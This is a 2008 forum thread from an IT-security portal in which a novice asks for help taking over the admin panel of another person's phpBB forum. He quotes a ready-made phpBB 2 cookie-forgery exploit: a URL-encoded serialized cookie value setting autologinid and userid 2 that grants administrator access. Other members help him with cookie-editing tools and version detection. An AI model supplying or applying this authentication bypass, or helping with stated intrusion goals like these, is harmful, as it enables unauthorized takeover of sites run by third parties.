Waraxe IT Security Portal
Login or Register
December 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 114
Members: 0
Total: 114
Full disclosure
CyberDanube Security Research 20241219-0 | Authenticated Remote Code Execution in Ewon Flexy 205
Stored XSS with Filter Bypass - blogenginev3.3.8
[SYSS-2024-085]: Broadcom CA Client Automation - Improper Privilege Management (CWE-269)
[KIS-2024-07] GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities
RansomLordNG - anti-ransomware exploit tool
APPLE-SA-12-11-2024-9 Safari 18.2
APPLE-SA-12-11-2024-8 visionOS 2.2
APPLE-SA-12-11-2024-7 tvOS 18.2
APPLE-SA-12-11-2024-6 watchOS 11.2
APPLE-SA-12-11-2024-5 macOS Ventura 13.7.2
APPLE-SA-12-11-2024-4 macOS Sonoma 14.7.2
APPLE-SA-12-11-2024-3 macOS Sequoia 15.2
APPLE-SA-12-11-2024-2 iPadOS 17.7.3
APPLE-SA-12-11-2024-1 iOS 18.2 and iPadOS 18.2
SEC Consult SA-20241211-0 :: Reflected Cross-Site Scripting in Numerix License Server Administration System Login
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> Need help with this?
Post new topicReply to topic View previous topic :: View next topic
Need help with this?
PostPosted: Mon Mar 31, 2008 2:31 pm Reply with quote
Jakobsen
Regular user
Regular user
Joined: Mar 31, 2008
Posts: 7




Hello. I'm sitting here and wondering how U all smart heads can figure all this out. Maybe many have read and read, and just have it as a hobby. I've looked at this forum for a couple of days now and read and read, but my english is not so well, so the hard things, its difficult to understand.

Im sitting here and I want to try to get admin-panel, (controlpanel), but i cant. I've watched SO MANY videos and read in here, but again, didnt understand so much.

Many are talking about HASH, and cookie.. But when i try to find the folder cookie.txt, i cant? And i cant find my cookies in the computer.

I can only find the cookies if im going into it when Mozilla Firefox is open at the same time. Do i need some programs? And yes, i've tried to find something about it. But again, im from Denmark, so its a bit difficult to understand all the hard words.

Regards. Confused
View user's profile Send private message
-..
PostPosted: Mon Mar 31, 2008 2:34 pm Reply with quote
Jakobsen
Regular user
Regular user
Joined: Mar 31, 2008
Posts: 7




When i try to find out what version it is (because that is important), this is coming: Powered by phpBB © 2001, 2005 phpBB Group

But that does not tell what version. But as i know, its very old. 2-3 years.

Maybe this can help to figure out the version:
We request you retain the full copyright notice below including the link to www.phpbb.com.
This not only gives respect to the large amount of time given freely by the developers
but also helps build interest, traffic and use of phpBB 2.0. If you cannot (for good
reason) retain the full copyright we request you at least leave in place the
Powered by phpBB line, with phpBB linked to www.phpbb.com. If you refuse
to include even this then support on our forums may be affected.

I found that in the source-code.
View user's profile Send private message
PostPosted: Mon Mar 31, 2008 2:36 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




If you use Mozilla try this https://addons.mozilla.org/en-US/firefox/addon/573
View user's profile Send private message
PostPosted: Mon Mar 31, 2008 2:41 pm Reply with quote
Jakobsen
Regular user
Regular user
Joined: Mar 31, 2008
Posts: 7




koko wrote:
If you use Mozilla try this https://addons.mozilla.org/en-US/firefox/addon/573


Thanks. That was 1 step further. The Edit Cookies i found before, that couldnt download, because it was too old. But the link u just send me, that worked. Thanks.

Now i vil look at this, and turn back, when i run into more problems (sure i do again Shocked )
View user's profile Send private message
..
PostPosted: Mon Mar 31, 2008 2:50 pm Reply with quote
Jakobsen
Regular user
Regular user
Joined: Mar 31, 2008
Posts: 7




1 - or more stupid questions.

I've red this topic again and again.
"** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..

1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:

3- Close the Browser ..

2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example Wink

and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor

3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//

save the cookies.txt..

4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! Very Happy

complete the mission by clicking " Go to Administration Panel "

http://www.waraxe.us/ftopict-610.html"

Im visiting the forum i want to log in as an admin. I have a account there, but as i understand, i dont need to log in. So i dont.
I have the Cookie Editor.
Now it says that i shall open cookies.txt .. I've searched in the computer, and i dont got the file. Is it a file i shall create myself? Or what?


Can i maybe get a msn or something, to talk to? Thats a bit easier.

Sorry my stupidness.
View user's profile Send private message
PostPosted: Mon Mar 31, 2008 4:56 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




This not work in new phpBB version.
I give you program to edit cookies.
View user's profile Send private message
PostPosted: Mon Mar 31, 2008 6:44 pm Reply with quote
Jakobsen
Regular user
Regular user
Joined: Mar 31, 2008
Posts: 7




koko wrote:
This not work in new phpBB version.
I give you program to edit cookies.


Im pretty sure that it's an old version. Almost 100.

Yes. And thanks. But when i have read and read, and dont know what to do now, there is not much to do. I've created my own PhpBBforum for some weeks ago to try it out, but without luck to reach into the adminpanel.

Yes. I'm a noob. Or noob isn't the word. Ultra-noob. Wink
View user's profile Send private message
PostPosted: Tue Apr 01, 2008 1:28 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




use the firefox plugin to edit cookies, it's the same as editing cookies.txt.

to find out what version of phpbb, go to http://site.com/docs/CHANGELOG.html

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Tue Apr 01, 2008 2:13 pm Reply with quote
Jakobsen
Regular user
Regular user
Joined: Mar 31, 2008
Posts: 7




gibbocool wrote:
use the firefox plugin to edit cookies, it's the same as editing cookies.txt.

to find out what version of phpbb, go to http://site.com/docs/CHANGELOG.html


Thanks for trying to help me.

I've tried to go to http://www.site.com/docs/CHANGELOG.html

But it says that the site does not exist?
View user's profile Send private message
PostPosted: Tue Apr 01, 2008 2:26 pm Reply with quote
Jakobsen
Regular user
Regular user
Joined: Mar 31, 2008
Posts: 7




To make it easier to understand me, i've send this screenshot.. Maybe that can help.
I've logged in.. So the cookie is created. I found sys(bla bla)_data.. And push on it. But then there isnt anymore. Only a long cookie called all kind of letters, but nothing else.. Here:
View user's profile Send private message
Need help with this?
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.041 Seconds